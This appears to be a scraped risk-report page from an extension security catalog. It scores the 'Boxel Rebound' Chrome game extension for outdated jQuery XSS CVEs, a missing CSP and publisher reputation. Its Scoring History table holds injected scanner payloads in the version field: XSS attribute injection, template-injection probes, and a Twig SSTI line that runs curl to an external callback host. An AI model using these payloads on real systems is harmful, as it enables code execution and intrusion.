Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

Boxel Rebound

iginnfkhmmfhlkagcmpgofnjhanpmklb
Risk Score
3.14
Risk Level: Low
Recommendation: 🟢 LOW RISK — review
Category Entertainment
Installs 800,000
Rating 4.6
Last updated
Manifest version MV3
CSP present ❌ no
Developer deben3@gmail.com
Verified publisher ✅ yes
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • jquery@3.3.1 bundles 3 moderate XSS CVEs (CVE-2019-11358, CVE-2020-11022, CVE-2020-11023); no CSP amplifies risk.
  • Developer uses free-webmail email (gmail) with no developer name listed.
  • last_updated missing — maintenance posture unknown; stale library version reinforces concern.
  • description_promise flags is_shell_pattern=true; extension appears to be a game wrapper.
  • Privacy policy third_party_silence=true; no explicit statement on third-party data sharing.

Evidence

  • cve_moderate_x3_jquery crx jquery@3.3.1 has 3 moderate CVEs (XSS); fixed_in 3.5.0. No CSP present on MV3 extension.
  • no_csp_present manifest content_security_policy is null; no CSP defined, raising DOM-XSS exposure from CVE-laden jQuery.
  • dom_sink_innerhtml_userctrl crx Clock.js assigns timer variables to innerHTML — DOM-XSS sink, elevated by missing CSP + CVEs.
  • free_webmail_no_devname store developer_email=deben3@gmail.com; developer_name is empty. Reputation penalty applies.
  • verified_publisher_featured store verified_publisher=true AND is_featured_by_google=true; reputation discounts applied.
  • shell_pattern_game store description_promise.is_shell_pattern=true; game wrapper extension with 1M installs.
  • maintenance_unknown store last_updated and months_since_update are null; stale library version suggests possible abandonment.
  • privacy_third_party_silence api Privacy policy fetched, scoped, retention present, but third_party_silence=true; +1.0 applied.

CVE Exposures (3)

CVELibrarySeverity Fixed inSummary
CVE-2019-11358 jquery@3.3.1 moderate 3.4.0 XSS in jQuery as used in Drupal, Backdrop CMS, and other products
CVE-2020-11022 jquery@3.3.1 moderate 3.5.0 Potential XSS vulnerability in jQuery
CVE-2020-11023 jquery@3.3.1 moderate 3.5.0 Potential XSS vulnerability in jQuery

Permissions Breakdown

  • storage low Used to save game progress/settings locally; minimal risk.

Pillar Scores

Permissions0.30
Reputation4.00
Network0.00
Webstore4.50
Maintenance5.00
Privacy1.00
Code Quality2.00
CVE Exposure3.00

Scoring History

%76%33%2E%36%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%59%30%53%56%28%39%36%38%39%34%29%22 2.72 Low allow 2026-08-05
<%={{={@{#{${dfb}}%> 2.17 Low allow 2026-08-05
v3.6&n962341=v986828 3.47 Low review 2026-08-05
fsssiedx<sssiedx 3.27 Low review 2026-08-04
fsssiedxa xx psssiedx 2.49 Low review 2026-08-03
fsssiedxa&#x22;sssiedx 2.77 Low review 2026-08-03
sssieddrubricxsx 2.27 Low allow 2026-08-03
v3.69336"();}]9387 3.41 Low review 2026-07-29
v3.6"sTYLe='zzz:Expre/**/SSion(RG9z(9538))'bad=" 2.19 Low allow 2026-07-29
v3.6" pmGd=RG9z([!+!]) Ym6=" 2.49 Low review 2026-07-29
dfb{{98991*97996}}xca 3.51 Low allow 2026-07-29
bfgx5961%C0%BEz1%C0%BCz2a%90bcxhjl5961 2.07 Low allow 2026-07-29
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 2.61 Low allow 2026-07-29
<th:t="${dfb}#foreach 2.29 Low allow 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitcugetotqzof0ed5.bxss.me")}} 2.48 Low review 2026-07-29
v3.6&n969859=v921023 1.72 Low review 2026-07-29
v3.6 3.14 Low review 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:43
Listing SHA 32b610b6071e…
Force block — not fired
Score recovered no
Elapsed 26.3s